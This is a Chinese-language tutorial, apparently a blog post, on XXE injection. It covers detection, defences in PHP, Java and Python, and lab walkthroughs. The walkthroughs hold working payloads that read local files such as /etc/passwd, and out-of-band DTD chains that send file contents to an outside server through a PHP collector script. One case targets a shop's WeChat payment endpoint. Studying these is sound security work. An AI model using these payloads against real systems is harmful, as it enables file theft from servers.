XML&XXE实体注入
原理
XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。等同于JSON传输。XXE漏洞XML External Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网扫描、攻击内网等危害。
XML 与 HTML 的主要差异
XML 被设计为传输和存储数据,其焦点是数据的内容。
HTML 被设计用来显示数据,其焦点是数据的外观。
HTML 旨在显示信息 ,而XML旨在传输存储信息。
Example:网站的xml文件解析
XXE黑盒发现
- 1、获取得到Content-Type或数据类型为xml时,尝试xml语言payload进行测试
- 2、不管获取的Content-Type类型或数据传输类型,均可尝试修改后提交测试xxe
- 3、XXE不仅在数据传输上可能存在漏洞,同样在文件上传引用插件解析或预览也会造成文件中的XXE Payload被执行
XXE白盒发现
- 1、可通过应用功能追踪代码定位审计
- 2、可通过脚本特定函数搜索定位审计
- 3、可通过伪协议玩法绕过相关修复等
XXE修复防御方案:
方案1-禁用外部实体
PHP:
libxml_disable_entity_loader(true);
JAVA:
DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();dbf.setExpandEntityReferences(false);
Python:
from lxml import etreexmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))
方案2-过滤用户提交的XML数据
过滤关键词:<!DOCTYPE和<!ENTITY,或者SYSTEM和PUBLIC
案例
抓取登录框数据包
![](https://img-blog.csdnimg.cn/direct/dd25d8dd9b83428f8d4c9f7ea2bc71cc.png)
xml数据包可以看Content-Type,和数据包格式,
一般的数据包格式为:user=admin&pass=123
json格式的为:message{ "user":100,
"passwd":20 }
![](https://img-blog.csdnimg.cn/direct/e1258359f4f640e8a12e1f4e02a29c02.png)
回显
直接构造
构造恶意xml数据包读取d盘下123.txt
<?xml version="1.0"?>
<!DOCTYPE Mikasa [
<!ENTITY test SYSTEM "file:///d:/123.txt">
]>
<user><username>&test;</username><password>Mikasa</password></user>
成功读取到d盘下123.txt
![](https://img-blog.csdnimg.cn/direct/458b4593249c40e18dfff766251f4846.png)
外部引用实体dtd
创建一个123.dtd文件到到服务器,因为靶场就在本机,我就直接在本地创建
读取d盘下123.txt
<!ENTITY send SYSTEM "file:///d:/123.txt">
![](https://img-blog.csdnimg.cn/direct/d5d40fd7ebf846d59b0df5e1ea0119d6.png)
然后使用python开启http服务
![](https://img-blog.csdnimg.cn/direct/0cfc2274fed846e1bf297ad0816ecf91.png)
成功执行
<?xml version="1.0" ?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "http://192.168.100.2:5566/123.dtd">
%file;
]>
<user><username>&send;</username><password>Mikasa</password></user>
![](https://img-blog.csdnimg.cn/direct/8686fa31e79e4cdaa63c45abb894f3b7.png)
无回显
带外测试
我搭建的服务器不知道怎么回事,一直返回500的错误,但是dnslog显示已经访问
<?xml version="1.0" ?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "http://gtegti.dnslog.cn">
%file;
]>
<user><username>&send;</username><password>xiaodi</password></user>
![](https://img-blog.csdnimg.cn/direct/011c2f37a10e4838a7bcae3a531ee961.png)
dnslog访问成功
![](https://img-blog.csdnimg.cn/direct/fb0e6a33232a4f45a8e2ee6659e64b92.png)
无回显读文件
将get.php放入到服务器,
<?php
$data=$_GET['file'];
$myfile = fopen("file.txt", "w+");
fwrite($myfile, $data);
fclose($myfile);
?>
将test.dtd放入服务器
<!ENTITY % all "<!ENTITY send SYSTEM 'http://47.94.236.117/get.php?file=%file;'>">
开启php服务
php -S 0.0.0.0:5566
![](https://img-blog.csdnimg.cn/direct/7414e7eb52d34973b12921830d6917f0.png)
<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///d:/123.txt">
<!ENTITY % remote SYSTEM "http://x.x.x.x:5566/test.dtd">
%remote;
%all;
]>
<root>&send;</root>
![](https://img-blog.csdnimg.cn/direct/e81517a734a24b56b12ce33fe161abcc.png)
服务器生成读取出来的file.txt
![](https://img-blog.csdnimg.cn/direct/890fd61d638c4d8e98e5fd51970e9157.png)
测试案例
![](https://img-blog.csdnimg.cn/direct/26a44a57909f4896bf99768fafe77d40.png)
抓包显示的是json的数据包
![](https://img-blog.csdnimg.cn/direct/c8d2255db0f442949e2f659b7092dc8a.png)
将json数据类型改成xml类型
<?xml version="1.0"?>
<!DOCTYPE Mikasa [
<!ENTITY test SYSTEM "file:///etc/passwd">
]>
<user>&test;</user>
![](https://img-blog.csdnimg.cn/direct/0be0ba5e905f4444a5b057cff287628d.png)
白盒审计
搜索simplexml函数
![](https://img-blog.csdnimg.cn/direct/0e6491f4b7e4431f8559fca8dec8164c.png)
找到simplexml函数
![](https://img-blog.csdnimg.cn/direct/2cd6cf7f02464e2bb4180a208ba174b7.png)
pe_getxml方法用到了simplexml,使用CTRL+B快捷键转到pe_getxml方法声明或用例
![](https://img-blog.csdnimg.cn/direct/76db459b186e4afdb9c8f2feceaff90b.png)
转到pe_getxml用例可以看到,wechat_getxml调用了pe_getxml,相当于wechat_getxml调用了simplexml函数。
![](https://img-blog.csdnimg.cn/direct/f7f271e04b1a4513ba4a162ac57f4210.png)
使用CTRL+B快捷键转到wechat_getxml方法声明或用例,下面使用xml返回的数据都是固定的,应该是无回显
![](https://img-blog.csdnimg.cn/direct/09ed5a3ec536407ba115b26ed3e16bf1.png)
复制路径地址访问抓包
include/plugin/payment/wechat/notify_url.php
![](https://img-blog.csdnimg.cn/direct/978d92e37ad44ad0b4b6cf51fbb92ad9.png)
使用带外测试
<?xml version="1.0" ?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "http://55vl9k.dnslog.cn">
%file;
]>
![](https://img-blog.csdnimg.cn/direct/600b3868f95a492aa04228ff229fb27f.png)
![](https://img-blog.csdnimg.cn/direct/2650d2c91a4a43ad9d947d8d26525089.png)
无回显读文件
原格式读取
将get.php放入到服务器,
<?php
$data=$_GET['file'];
$myfile = fopen("file.txt", "w+");
fwrite($myfile, $data);
fclose($myfile);
?>
将test.dtd放入服务器
<!ENTITY % all "<!ENTITY send SYSTEM 'http://x.x.x.x:5566/get.php?file=%file;'>">
开启php服务
php -S 0.0.0.0:5566
![](https://img-blog.csdnimg.cn/direct/e27c02a3da0b4a76b17b2ae866be9473.png)
<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///d:/123.txt">
<!ENTITY % remote SYSTEM "http://x.x.x.x:5566/test.dtd">
%remote;
%all;
]>
<root>&send;</root>
查看生成的file.txt,成功读取到c盘下123.txt
![](https://img-blog.csdnimg.cn/direct/a6ec96ce47f046769cd91e4d992b4dd9.png)
base64读带空格文件
<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=c:/123.txt">
<!ENTITY % remote SYSTEM "http://x.x.x.x:5566/test.dtd">
%remote;
%all;
]>
<root>&send;</root>
![](https://img-blog.csdnimg.cn/direct/4020b5e593244c7f99a5dbc447ec4488.png)
成功读取并以base64编码格式
![](https://img-blog.csdnimg.cn/direct/fc78a25c73c44cc596b40bee024bd236.png)
解码还原
![](https://img-blog.csdnimg.cn/direct/0418ef95c2664c52b60d23f581dfc8cc.png)